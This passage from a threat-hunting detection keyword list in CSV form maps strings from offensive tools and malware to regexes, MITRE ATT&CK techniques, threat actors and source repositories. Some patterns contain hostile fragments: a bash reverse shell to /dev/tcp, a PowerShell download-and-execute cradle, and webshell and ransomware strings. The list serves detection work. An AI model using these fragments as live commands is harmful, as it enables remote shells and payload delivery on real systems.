Access","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3900" "*# Minimalistic TCP and UDP port scanners*",".{0,1000}\#\sMinimalistic\sTCP\sand\sUDP\sport\sscanners.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - 
TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","N/A","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","3901" "*# Perform the HTTP POST request to search emails*",".{0,1000}\#\sPerform\sthe\sHTTP\sPOST\srequest\sto\ssearch\semails.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","3902" "*# Pop up the calculator when you start excel.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\sexcel\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3903" "*# Pop up the calculator when you start powerpoint.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\spowerpoint\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3904" "*# Pop up the calculator when you start winword.exe*",".{0,1000}\#\sPop\sup\sthe\scalculator\swhen\syou\sstart\swinword\.exe.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 
","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3905" "*# README\n\nYour Files has been encrypted*",".{0,1000}\#\sREADME\\n\\nYour\sFiles\shas\sbeen\sencrypted.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","3906" "*# Smbtouch Scanner*",".{0,1000}\#\sSmbtouch\sScanner.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","3907" "*# socksport = 9050*",".{0,1000}\#\ssocksport\s\=\s9050.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","3908" "*# Sticky Keys backdoor exists*",".{0,1000}\#\sSticky\sKeys\sbackdoor\sexists.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","3909" "*# Using reflection to dump LSASS in-memory with 
stealth*",".{0,1000}\#\sUsing\sreflection\sto\sdump\sLSASS\sin\-memory\swith\sstealth.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","3910" "*# Windows RCE Tool*",".{0,1000}\#\sWindows\sRCE\sTool.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","3911" "*#!/bin/bash\n/bin/bash -c 'sh -i >& /dev/tcp/*/* 0>&1*",".{0,1000}\#!\/bin\/bash\\n\/bin\/bash\s\-c\s\'sh\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","3912" "*## DLHell Main function*",".{0,1000}\#\#\sDLHell\sMain\sfunction.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3913" "*## Extracting Private Key from Active Directory 
Store*",".{0,1000}\#\#\sExtracting\sPrivate\sKey\sfrom\sActive\sDirectory\sStore.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","3914" "*#1 - Smuggling binary via Service DisplayName*",".{0,1000}\#1\s\-\sSmuggling\sbinary\svia\sService\sDisplayName.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3915" "*#2 - Smuggling binary via WMI*",".{0,1000}\#2\s\-\sSmuggling\sbinary\svia\sWMI.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","3916" "*#Author Yehia Elghaly*",".{0,1000}\#Author\sYehia\sElghaly.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","3917" "*#Bind Shell (Client) (XOR Algorithm)*",".{0,1000}\#Bind\sShell\s\(Client\)\s\(XOR\sAlgorithm\).{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - 
TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","#content","N/A","8","10","4","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z","3918" "*#BOT#CloseServer*",".{0,1000}\#BOT\#CloseServer.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3919" "*#BOT#OpenUrl*",".{0,1000}\#BOT\#OpenUrl.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3920" "*#BOT#RunPrompt*",".{0,1000}\#BOT\#RunPrompt.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3921" "*#BOT#SvrUninstall*",".{0,1000}\#BOT\#SvrUninstall.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows 
attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3922" "*#BOT#URLDownload*",".{0,1000}\#BOT\#URLDownload.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3923" "*#BOT#URLUpdate*",".{0,1000}\#BOT\#URLUpdate.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3924" "*#Code By Leeon123*",".{0,1000}\#Code\sBy\sLeeon123.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","N/A","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","3925" "*#CODED BY 
SMUKX*",".{0,1000}\#CODED\sBY\sSMUKX.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","3926" "*#Dumps exported function from legit DLL using winedump*",".{0,1000}\#Dumps\sexported\sfunction\sfrom\slegit\sDLL\susing\swinedump.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3927" "*#GetClipboardText*",".{0,1000}\#GetClipboardText.{0,1000}","offensive_tool_keyword","Fynloski Backdoor","Backdoor Fynloski also known as DarkComet - allows attackers to control the infected system and install other malware remotely","T1105 - T1071 - T1219 - T1059 - T1203 - T1056 - T1113","TA0011 - TA0009 - TA0010 - TA0008 - TA0002 - TA0005","N/A","N/A","Malware","https://www.hybrid-analysis.com/sample/43b40a12a966313f889c338e07239a42af67a69745507e45c4e899bcfa913b81/5a3d55d27ca3e1257f7044f3","1","0","N/A","N/A","7","7","N/A","N/A","N/A","N/A","3928" "*#god bless you, NSA's autorootkit*",".{0,1000}\#god\sbless\syou,\sNSA\'s\sautorootkit.{0,1000}","offensive_tool_keyword","Orc","Orc is a post-exploitation framework for Linux written in Bash","T1059.004 - T1036.005 - T1070.002 - T1012 - T1082 - T1003 - T1555.003 - T1049 - T1134.001 - T1202","TA0005 - TA0003 - TA0002 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zMarch/Orc","1","0","#linux #content","N/A","9","4","395","53","2019-11-12T18:21:27Z","2018-08-16T11:31:39Z","3929" "*#include 
""DirtyVanity.h""*",".{0,1000}\#include\s\""DirtyVanity\.h\"".{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","3930" "*#include ""RogueOxidResolver.h*",".{0,1000}\#include\s\""RogueOxidResolver\.h.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","3931" "*#include ""ShoggothEngine.h""*",".{0,1000}\#include\s\""ShoggothEngine\.h\"".{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","3932" "*#pip install pycryptodome , It works only v3.11.5 Above.*",".{0,1000}\#pip\sinstall\spycryptodome\s\s,\sIt\sworks\sonly\sv3\.11\.5\sAbove\..{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","3933" "*#Removes previous hijacked dll*",".{0,1000}\#Removes\sprevious\shijacked\sdll.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","#content","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","3934" 
"*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*${""\x47\x4c\x4f\x42\x41\x4c\x53""}*",".{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}\$\{\""\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\""\}.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","3936" "*${White}A tool to perform clipboard poisoning attack*",".{0,1000}\$\{White\}A\stool\sto\sperform\sclipboard\spoisoning\sattack.{0,1000}","offensive_tool_keyword","pastehakk","perform clipboard poisoning or paste jacking attack","T1115","T0001 - T0002 - T0005","N/A","N/A","Phishing","https://github.com/3xploitGuy/pastehakk","1","0","#linux #content","N/A","7","1","56","10","2020-06-22T01:17:53Z","2020-06-17T19:32:24Z","3937" "*$2y$10$ACTF7jbtyof6YoTCqitwLOxQ9II8xitPKC4pNi6SQjZM3HXkKiCZ*",".{0,1000}\$2y\$10\$ACTF7jbtyof6YoTCqitwLOxQ9II8xitPKC4pNi6SQjZM3HXkKiCZ.{0,1000}","offensive_tool_keyword","Gecko","Gecko Backdoor is a web php backdoor","T1100 - T1059 - T1105 - T1203","TA0011 - TA0003","N/A","N/A","C2","https://github.com/MadExploits/Gecko","1","0","N/A","N/A","10","10","118","56","2025-02-08T17:50:28Z","2022-07-15T05:51:04Z","3938" "*$ADelegReport*",".{0,1000}\$ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","3939" "*$adPEAS_*",".{0,1000}\$adPEAS_.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration - wrapper for PowerView - PoshADCS - 
BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","0","#content","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","3940" "*$AllCurrentPwdDiscovered*",".{0,1000}\$AllCurrentPwdDiscovered.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","3941" "*$attacker_IPlist*",".{0,1000}\$attacker_IPlist.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3942" "*$B64PwshCommand*",".{0,1000}\$B64PwshCommand.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","N/A","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","3943" "*$backdoorcode*",".{0,1000}\$backdoorcode.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","3944" "*$BaseTicket | Select-String -Pattern 
'doI.*",".{0,1000}\$BaseTicket\s\|\sSelect\-String\s\-Pattern\s\'doI\..{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3946" "*$c.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;`i`e`x $c.downloadstring*",".{0,1000}\$c\.Proxy\.Credentials\=\[Net\.CredentialCache\]\:\:DefaultCredentials\;\`i\`e\`x\s\$c\.downloadstring.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","3947" "*$C2_SERVER*",".{0,1000}\$C2_SERVER.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","3948" "*$C2ExternalIP*",".{0,1000}\$C2ExternalIP.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3949" "*$C2Output@$date.pdf*",".{0,1000}\$C2Output\@\$date\.pdf.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","3950" "*$calcwllx64 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4*",".{0,1000}\$calcwllx64\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\+AAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use 
powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3951" "*$calcwllx86 = ""TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4*",".{0,1000}\$calcwllx86\s\=\s\""TVqQAAMAAAAEAAAA\/\/8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z","3952" "*$CertutilDump*",".{0,1000}\$CertutilDump.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","3953" "*$DNSExfiltratorLib*",".{0,1000}\$DNSExfiltratorLib.{0,1000}","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. 
This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","0","N/A","N/A","10","9","867","188","2024-04-29T20:20:43Z","2017-12-20T13:58:09Z","3954" "*$DriverName = ""Totally Not Malicious""*",".{0,1000}\$DriverName\s\=\s\""Totally\sNot\sMalicious\"".{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#content","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","3955" "*$DummyServiceName*",".{0,1000}\$DummyServiceName.{0,1000}","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3956" "*$dumpDir\lsass.txt*",".{0,1000}\$dumpDir\\lsass\.txt.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","3957" "*$DumpLsass=*",".{0,1000}\$DumpLsass\=.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - 